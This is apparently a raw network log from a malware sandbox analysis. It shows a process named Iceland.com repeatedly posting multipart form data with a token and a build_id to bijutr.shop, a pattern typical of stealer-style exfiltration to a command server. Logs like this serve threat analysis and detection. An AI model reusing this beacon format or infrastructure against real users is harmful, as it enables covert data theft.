                                                                                                                                                                                                                                                              2024-12-27 06:10:34 UTC3269OUTData Raw: 2d 2d 2d 2d 2d 2d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------AAAAAAAAAAAAAAAAAAAAContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------AAAAAAAAAAAAAAAAAAAAContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------AAAAAAAAAAAAAAAAAAAACont
                                                                                                                                                                                                                                                              2024-12-27 06:10:35 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:35 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:10:35 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              29192.168.2.449859188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:10:35 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----3WB1NY58Q9RIMYCT00ZU
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 11445
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:10:35 UTC11445OUTData Raw: 2d 2d 2d 2d 2d 2d 33 57 42 31 4e 59 35 38 51 39 52 49 4d 59 43 54 30 30 5a 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 33 57 42 31 4e 59 35 38 51 39 52 49 4d 59 43 54 30 30 5a 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 33 57 42 31 4e 59 35 38 51 39 52 49 4d 59 43 54 30 30 5a 55 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------3WB1NY58Q9RIMYCT00ZUContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------3WB1NY58Q9RIMYCT00ZUContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------3WB1NY58Q9RIMYCT00ZUCont
                                                                                                                                                                                                                                                              2024-12-27 06:10:36 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:36 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:10:36 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              30192.168.2.449865188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:10:37 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----9ZMY5PP8Q9RIM79H47YU
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 14153
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:10:37 UTC14153OUTData Raw: 2d 2d 2d 2d 2d 2d 39 5a 4d 59 35 50 50 38 51 39 52 49 4d 37 39 48 34 37 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 39 5a 4d 59 35 50 50 38 51 39 52 49 4d 37 39 48 34 37 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 39 5a 4d 59 35 50 50 38 51 39 52 49 4d 37 39 48 34 37 59 55 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------9ZMY5PP8Q9RIM79H47YUContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------9ZMY5PP8Q9RIM79H47YUContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------9ZMY5PP8Q9RIM79H47YUCont
                                                                                                                                                                                                                                                              2024-12-27 06:10:38 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:38 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:10:38 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              31192.168.2.449866188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:10:38 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----9ZMY5PP8Q9RIM79H47YU
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 4277
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:10:38 UTC4277OUTData Raw: 2d 2d 2d 2d 2d 2d 39 5a 4d 59 35 50 50 38 51 39 52 49 4d 37 39 48 34 37 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 39 5a 4d 59 35 50 50 38 51 39 52 49 4d 37 39 48 34 37 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 39 5a 4d 59 35 50 50 38 51 39 52 49 4d 37 39 48 34 37 59 55 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------9ZMY5PP8Q9RIM79H47YUContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------9ZMY5PP8Q9RIM79H47YUContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------9ZMY5PP8Q9RIM79H47YUCont
                                                                                                                                                                                                                                                              2024-12-27 06:10:39 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:39 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:10:39 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              32192.168.2.449872188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:10:40 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----9ZMGDJMO89RQQIMO8QI5
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 6249
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:10:40 UTC6249OUTData Raw: 2d 2d 2d 2d 2d 2d 39 5a 4d 47 44 4a 4d 4f 38 39 52 51 51 49 4d 4f 38 51 49 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 39 5a 4d 47 44 4a 4d 4f 38 39 52 51 51 49 4d 4f 38 51 49 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 39 5a 4d 47 44 4a 4d 4f 38 39 52 51 51 49 4d 4f 38 51 49 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------9ZMGDJMO89RQQIMO8QI5Content-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------9ZMGDJMO89RQQIMO8QI5Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------9ZMGDJMO89RQQIMO8QI5Cont
                                                                                                                                                                                                                                                              2024-12-27 06:10:41 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:41 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:10:41 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              33192.168.2.449877188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:10:41 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----9ZMGDJMO89RQQIMO8QI5
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 4573
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:10:41 UTC4573OUTData Raw: 2d 2d 2d 2d 2d 2d 39 5a 4d 47 44 4a 4d 4f 38 39 52 51 51 49 4d 4f 38 51 49 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 39 5a 4d 47 44 4a 4d 4f 38 39 52 51 51 49 4d 4f 38 51 49 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 39 5a 4d 47 44 4a 4d 4f 38 39 52 51 51 49 4d 4f 38 51 49 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------9ZMGDJMO89RQQIMO8QI5Content-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------9ZMGDJMO89RQQIMO8QI5Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------9ZMGDJMO89RQQIMO8QI5Cont
                                                                                                                                                                                                                                                              2024-12-27 06:10:42 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:42 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:10:42 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              34192.168.2.449882188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:10:43 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----PP8Y5FC2NGV3EUS26P89
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 1977
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:10:43 UTC1977OUTData Raw: 2d 2d 2d 2d 2d 2d 50 50 38 59 35 46 43 32 4e 47 56 33 45 55 53 32 36 50 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 50 50 38 59 35 46 43 32 4e 47 56 33 45 55 53 32 36 50 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 50 50 38 59 35 46 43 32 4e 47 56 33 45 55 53 32 36 50 38 39 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------PP8Y5FC2NGV3EUS26P89Content-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------PP8Y5FC2NGV3EUS26P89Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------PP8Y5FC2NGV3EUS26P89Cont
                                                                                                                                                                                                                                                              2024-12-27 06:10:44 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:44 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:10:44 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              35192.168.2.449885188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:10:44 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----PP8Y5FC2NGV3EUS26P89
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 3161
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:10:44 UTC3161OUTData Raw: 2d 2d 2d 2d 2d 2d 50 50 38 59 35 46 43 32 4e 47 56 33 45 55 53 32 36 50 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 50 50 38 59 35 46 43 32 4e 47 56 33 45 55 53 32 36 50 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 50 50 38 59 35 46 43 32 4e 47 56 33 45 55 53 32 36 50 38 39 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------PP8Y5FC2NGV3EUS26P89Content-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------PP8Y5FC2NGV3EUS26P89Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------PP8Y5FC2NGV3EUS26P89Cont
                                                                                                                                                                                                                                                              2024-12-27 06:10:45 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:45 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:10:45 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              36192.168.2.449891188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:10:46 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----7YU3OPPZC2VAIM790RI5
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 1697
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:10:46 UTC1697OUTData Raw: 2d 2d 2d 2d 2d 2d 37 59 55 33 4f 50 50 5a 43 32 56 41 49 4d 37 39 30 52 49 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 37 59 55 33 4f 50 50 5a 43 32 56 41 49 4d 37 39 30 52 49 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 37 59 55 33 4f 50 50 5a 43 32 56 41 49 4d 37 39 30 52 49 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------7YU3OPPZC2VAIM790RI5Content-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------7YU3OPPZC2VAIM790RI5Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------7YU3OPPZC2VAIM790RI5Cont
                                                                                                                                                                                                                                                              2024-12-27 06:10:47 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:47 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:10:47 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              37192.168.2.449892188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:10:47 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----DJMOZCB16P8YUAAS00Z5
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 1929
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:10:47 UTC1929OUTData Raw: 2d 2d 2d 2d 2d 2d 44 4a 4d 4f 5a 43 42 31 36 50 38 59 55 41 41 53 30 30 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 44 4a 4d 4f 5a 43 42 31 36 50 38 59 55 41 41 53 30 30 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 44 4a 4d 4f 5a 43 42 31 36 50 38 59 55 41 41 53 30 30 5a 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------DJMOZCB16P8YUAAS00Z5Content-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------DJMOZCB16P8YUAAS00Z5Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------DJMOZCB16P8YUAAS00Z5Cont
                                                                                                                                                                                                                                                              2024-12-27 06:10:49 UTC158INHTTP/1.1 200 OK
